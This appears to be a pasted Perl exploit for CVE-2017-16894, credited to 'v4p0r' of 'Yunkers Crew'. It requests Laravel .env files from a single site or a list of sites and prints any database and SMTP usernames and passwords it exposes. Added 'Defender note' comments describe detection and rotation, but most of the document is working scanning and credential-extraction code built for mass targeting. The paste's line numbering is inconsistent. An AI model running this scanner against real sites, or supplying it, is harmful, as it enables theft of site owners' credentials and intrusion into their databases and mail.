
Untitled

a guest
Nov 20th, 2017
  1. #!/usr/bin/perl
  2. # [CVE-2017-16894] - Laravel Environment Variables - Read passwords and login credentials
  3. # CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16894
  4. # POC: http://whiteboyz.xyz/laravel-env-file-vuln.html
  5. # Coder by v4p0r 20 NOV 2017
  6.  
  7. use strict;
  8. use warnings;
  9. use Getopt::Long;
  10. use WWW::Mechanize;
  11.  
  # Driver: parse the command line, then check either one URL (--site) or
  # every line of a file (--list-site) for a readable Laravel .env file.
  #
  # Defender note: the only exposure test below is the literal string
  # "APP_ENV" appearing in the HTTP response body. A positive means the
  # application's .env is being served to anonymous clients; the fix is on
  # the server side (do not serve dotfiles / keep .env outside the document
  # root) and every secret in the file should be rotated.

  # Argument count is taken before GetOptions() removes the switches from @ARGV.
  my $arg_count = scalar @ARGV;
  my $show_help;

  GetOptions(
      'list-site|l=s' => \$main::list,
      'site|s=s'      => \$main::site,
      'help|h'        => \$show_help,
  );

  # --help prints the usage text; banner() itself ends the program.
  banner() if $show_help;

  print "================================\n",
        " # Exploit: EAV EXPLOIT \n",
        " # Coder: v4p0r \n",
        " # Date: 21 NOV 2017 \n",
        "================================\n";

  # Single-target mode (--site).
  if ($main::site) {
      my $target = $main::site;
      print $target;
      my $body = request($target);

      if ($body !~ /APP_ENV/) {
          print "[NOT VULN]";
          # No exit on this path: execution continues with the checks below.
      }
      else {
          get_config($body);
          exit;
      }
  }

  # Zero or one command-line argument: show credits and the usage hint, then stop.
  if ($arg_count <= 1) {
      print "\nCoder: v4p0r\n",
            "Team: Yunkers Crew\n",
            "Twitter: 0x777null\n",
            "Skype: drx.priv\n\n",
            "Usage: perl $0 --help\n";
      exit;
  }

  # List mode (--list-site): the whole file is read into memory, one entry per line.
  open(my $list_fh, '<', $main::list) or die "\n [Lista nao selecionada]";
  my @targets = <$list_fh>;

  for my $entry (@targets) {
      print "\n[SITE]: " . $entry . "";
      my $body = request($entry);

      if ($body !~ /APP_ENV/) {
          print "[NOT VULN]";
      }
      else {
          get_config($body);
      }
  }
  78.  
  79.  
  # request($url) -> response body
  #
  # Performs one HTTP GET and returns the body as a scalar. A URL that does
  # not start with http:// or https:// is given an http:// prefix.
  #
  # Defender note: every request made here carries the fixed User-Agent
  # string 'Mozilla 5.0'. Together with a request path ending in ".env"
  # (see the usage example in banner), that is something access-log review
  # or a WAF rule can key on.
  sub request {
      my ($url) = @_;

      unless ($url =~ m{^https?://}) {
          $url = 'http://' . $url;
      }

      my $mech = WWW::Mechanize->new( agent => 'Mozilla 5.0' );
      $mech->timeout(3);                                  # value passed through to timeout()
      $mech->max_size(1024000);                           # cap on how much of the response is kept
      $mech->protocols_allowed( [ 'http', 'https' ] );    # no other URL schemes

      $mech->get($url);

      my $body = $mech->content;
      return $body;
  }
  95.  
  # get_config($env)
  #
  # Prints the database and mail settings found in $env (the text of a
  # Laravel .env file) to the currently selected output handle. For each key
  # the first "KEY=value" occurrence is used and the value runs to the end
  # of that line; a key that does not occur is reported as 'Nothing'.
  #
  # Defender note: everything printed here is secret material in clear text.
  # If an .env file was reachable over HTTP, each of these values should be
  # treated as disclosed and rotated, not just hidden again.
  sub get_config {
      my ($env) = @_;

      # Each entry: section heading, then the keys listed under it in output order.
      my @sections = (
          [
              "\n[DATABASE CONFIG]\n\n",
              [ qw(DB_CONNECTION DB_HOST DB_PORT DB_DATABASE DB_USERNAME DB_PASSWORD) ],
          ],
          [
              "\n[SMTP CONFIG]\n\n",
              [
                  qw(MAIL_DRIVER MAIL_HOST MAIL_PORT MAIL_FROM_NAME
                     MAIL_FROM_EMAIL MAIL_USERNAME MAIL_PASSWORD MAIL_ENCRYPTION)
              ],
          ],
      );

      for my $section (@sections) {
          my ($heading, $keys) = @{$section};
          print $heading;

          for my $key ( @{$keys} ) {
              # List-context match: $value stays undef when the key is absent.
              my ($value) = $env =~ /${key}=(.*)/;
              print "[" . $key . "]: " . ( $value // 'Nothing' ) . "\n";
          }
      }
  }
  135.  
  # banner()
  #
  # Prints the usage text (options and two example invocations) and then
  # terminates the program; it never returns to the caller.
  sub banner {
      my @usage_lines = (
          "\nUsage: $0 <comando>\n",
          "[+] Comandos:\n",
          "--help [Ajuda com os comandos]\n",
          "--list-site|l [Seleciona sua lista de sites]\n",
          "--site|s [Unico alvo]\n",
          "[!] Exemplos:\n",
          "perl $0 -l sites.txt\n",
          "perl $0 -s http://localhost/.env\n",
      );

      print @usage_lines;
      exit;
  }